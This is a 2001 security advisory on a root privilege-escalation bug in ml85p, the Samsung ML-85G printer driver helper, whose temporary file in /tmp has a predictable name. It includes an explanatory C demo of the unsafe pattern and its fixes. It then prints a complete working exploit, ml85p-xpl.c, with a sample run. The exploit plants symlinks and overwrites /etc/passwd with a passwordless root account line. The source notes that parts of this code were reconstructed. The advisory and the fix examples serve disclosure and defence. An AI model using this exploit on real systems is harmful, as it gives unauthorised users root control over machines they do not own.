Samsung ML-85G Printer Linux Driver Binary Exploit
17 Jul. 2001
Summary
The helper binary ml85p, part of the Samsung ML-85G GDI printer driver, creates its temporary file under a predictable name in /tmp (/tmp/ml85g followed by the current time) without checking whether that path already exists. Because ml85p runs with root privileges, a local user who plants a symlink at that name can have an arbitrary file created as root; with a permissive umask the file is also world-writable, so the user can then fill it with content of their choice. This leads to root compromise.
Vulnerable systems:
Ghostscript version 5.50-71
Ghostscript version 5.50-67
The symlink attack is not platform dependent, although the exploit below was written on x86; rare cases where it does not apply may exist. All systems running ml85p built from the source tarball are assumed to be vulnerable. ml85p is also distributed by MandrakeSoft in the ghostscript RPM, where the binary's permissions are more restrictive, so exploiting it there would require sys privileges.
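The summary above names the bug class but does not show the code pattern. The following is an added example, not code from the advisory or from the Samsung driver: it reproduces a predictable-name, O_CREAT-without-O_EXCL temporary file open of the kind the exploit below abuses, replays the planted-symlink attack against it in a private directory instead of /tmp, and sets the two standard fixes beside it. The driver's exact open() flags, the function names and the demo directory name are assumptions.

```c
/* Added example (not from the advisory or the Samsung driver): the
 * predictable-name temp file pattern behind ml85p, next to the fix.
 * Everything runs in a private mkdtemp() directory so it is self-contained;
 * the "<dir>/ml85g<time>" name mirrors the /tmp/ml85g<time> name the exploit
 * targets, and the driver's exact open() flags are an assumption. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <time.h>
#include <unistd.h>

/* Vulnerable pattern (assumed): guessable name and O_CREAT without O_EXCL.
 * If the path is already a symlink, open() follows it and creates whatever
 * it points to, owned by the caller (root for a setuid helper), with mode
 * 0666 & ~umask. */
int open_tmp_unsafe(const char *dir, time_t now)
{
    char path[PATH_MAX];
    snprintf(path, sizeof path, "%s/ml85g%ld", dir, (long)now);
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Fix 1: mkstemp() picks an unpredictable name and opens it with
 * O_CREAT|O_EXCL, mode 0600, whatever the umask. */
int open_tmp_safe(const char *dir, char *path_out, size_t path_len)
{
    snprintf(path_out, path_len, "%s/ml85gXXXXXX", dir);
    return mkstemp(path_out);
}

/* Fix 2, when the name must stay fixed: O_EXCL refuses an existing entry and
 * O_NOFOLLOW refuses a symlink, so a planted link yields EEXIST or ELOOP. */
int open_fixed_safe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Replay the attack against both patterns in a private directory.
 * Returns bit 0 set if the unsafe open created the victim through the
 * planted symlink, bit 1 set if the hardened open refused it; -1 on setup
 * failure.  The expected result is therefore 3. */
int demo(void)
{
    char dir[] = "/tmp/ml85demo.XXXXXX";
    char victim[PATH_MAX], planted[PATH_MAX], safe_path[PATH_MAX];
    struct stat st;
    time_t now = time(NULL);
    int fd, result = 0;

    if (mkdtemp(dir) == NULL)
        return -1;
    /* victim stands in for /etc/rc.owned; planted is what ml85p-xpl creates */
    snprintf(victim, sizeof victim, "%s/etc_rc.owned", dir);
    snprintf(planted, sizeof planted, "%s/ml85g%ld", dir, (long)now);
    if (symlink(victim, planted) != 0)
        return -1;

    /* the "privileged helper" makes its temp file: the victim appears instead */
    if ((fd = open_tmp_unsafe(dir, now)) >= 0) {
        close(fd);
        if (stat(victim, &st) == 0)
            result |= 1;
    }

    /* a hardened helper on the same planted path must fail */
    if (open_fixed_safe(planted) < 0 && (errno == EEXIST || errno == ELOOP))
        result |= 2;

    /* mkstemp variant: the attacker cannot guess this name in advance */
    if ((fd = open_tmp_safe(dir, safe_path, sizeof safe_path)) >= 0) {
        close(fd);
        unlink(safe_path);
    }

    unlink(planted);
    unlink(victim);
    rmdir(dir);
    return result;
}

int main(void)
{
    int r = demo();
    printf("unsafe open followed the symlink: %s; hardened open refused it: %s\n",
           (r & 1) ? "yes" : "no", (r & 2) ? "yes" : "no");
    return r == 3 ? 0 : 1;
}
```

Build with `gcc -Wall tmpfile_race.c -o tmpfile_race` and run as an ordinary user; no privileges are needed because the demo owns both the symlink and its target. Two caveats for anyone reproducing the original attack on a current system: the exploit's `umask 000` is what made the root-owned file mode 666, which the 0600 in both fixes removes, and Linux kernels since 3.6 with fs.protected_symlinks=1 refuse to follow a symlink in a sticky world-writable directory such as /tmp when the link owner differs from the follower, which blocks this class of attack against setuid helpers (the demo's private directory is not sticky, so it is unaffected).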
Exploit code (sample run, followed by the source):
$ ./ml85p-xpl /etc/rc.owned
owned::0:0:root:/root:/bin/bash
ml85p-xpl.c by core (c) 2001
> backing up /etc/rc.owned to /tmp/ez.n6ZT1m
/bin/cp: cannot stat `/etc/rc.owned': No such file or directory
/bin/touch: getting attributes of `/etc/rc.owned': No such file or directory
> creating a lot of symlinks
Running a few times since I'm lazy.
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
-rw-rw-rw- 1 root staff 0 Jul 10 13:14 /etc/rc.owned
-rw-rw-rw- 1 root staff 32 Jul 10 13:14 /etc/rc.owned
owned::0:0:root:/root:/bin/bash
> cleaning up
Don't forget to `cp /tmp/ez.n6ZT1m /etc/rc.owned && touch -r /tmp/ez.n6ZT1m /etc/rc.owned`!
All done. Enjoy!
/* ml85p-xpl.c
 *
 * Quick hack to exploit ml85p
 *
 * Simply run it with the file you want to create/overwrite
 * and the data you wish to place in the file.
 *
 * Example:
 *
 * $ gcc -g -Wall ml85p-xpl.c -o ml85p-xpl
 * $ ./ml85p-xpl /etc/passwd owned::0:0:root:/root:/bin/bash
 *
 * Then login as owned... etc..
 *
 * by Charles Stevenson <core@ezlink.com>
 *
 * July 10 2001
 *
 * exploit discovered by KF <dotslash@snosoft.com>
 *
 * shoutz b10z and word to Kevin for the quick tag team :)
 */
/* Only the symlink and ml85p loops survive on this page; the includes, main()
 * and the backup/payload/cleanup steps are reconstructed from the run above. */
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <unistd.h>

#define BRUTE 10  /* seconds of timestamps to cover; the run above shows 10 tries */
int main(int argc, char **argv)
{
    char temp[1024], tempfile[] = "/tmp/ez.XXXXXX";
    time_t the_time;
    int i, fd;
    if (argc < 3) { fprintf(stderr, "usage: %s <file> <data>\n", argv[0]); return 1; }
    fprintf(stderr, "ml85p-xpl.c by core (c) 2001\n");
    /* back up the target (and its timestamps) so it can be restored afterwards */
    if ((fd = mkstemp(tempfile)) < 0) { perror("mkstemp"); return 1; }
    close(fd);
    fprintf(stderr, "> backing up %s to %s\n", argv[1], tempfile);
    snprintf(temp, sizeof temp, "/bin/cp %s %s", argv[1], tempfile);
    system(temp);
    /* set the date/time */
    snprintf(temp, sizeof temp, "/bin/touch -r %s %s", argv[1], tempfile);
    system(temp);
    /* ml85p creates /tmp/ml85g<time(NULL)> as root without O_EXCL: plant a symlink
     * to the target for each of the next BRUTE seconds so one of them is hit */
    the_time = time(NULL);
    fprintf(stderr, "> creating a lot of symlinks\n");
    for (i = 0; i < BRUTE; i++) {
        snprintf(temp, sizeof temp, "/tmp/ml85g%ld", (long)(the_time + i));
        symlink(argv[1], temp);
    }
    /* ml85p rejects the bogus input ("Wrong file format.") only after it has
     * followed the symlink; umask 000 makes the file it creates mode 666 */
    snprintf(temp, sizeof temp, "echo \"b1nary 0utlawz\">file; umask 000 && ml85p -sf file\n");
    fprintf(stderr, "Running a few times since I'm lazy.\n");
    for (i = 0; i < BRUTE; i++)
        system(temp);
    /* the target now exists root-owned and world-writable: write the payload */
    snprintf(temp, sizeof temp, "ls -l %s; echo \"%s\" > %s; ls -l %s; cat %s",
             argv[1], argv[2], argv[1], argv[1], argv[1]);
    system(temp);
    fprintf(stderr, "> cleaning up\n");
    for (i = 0; i < BRUTE; i++) {
        snprintf(temp, sizeof temp, "/tmp/ml85g%ld", (long)(the_time + i));
        unlink(temp);
    }
    fprintf(stderr, "Don't forget to `cp %s %s && touch -r %s %s`!\n",
            tempfile, argv[1], tempfile, argv[1]);
    fprintf(stderr, "All done. Enjoy!\n");
    return 0;
}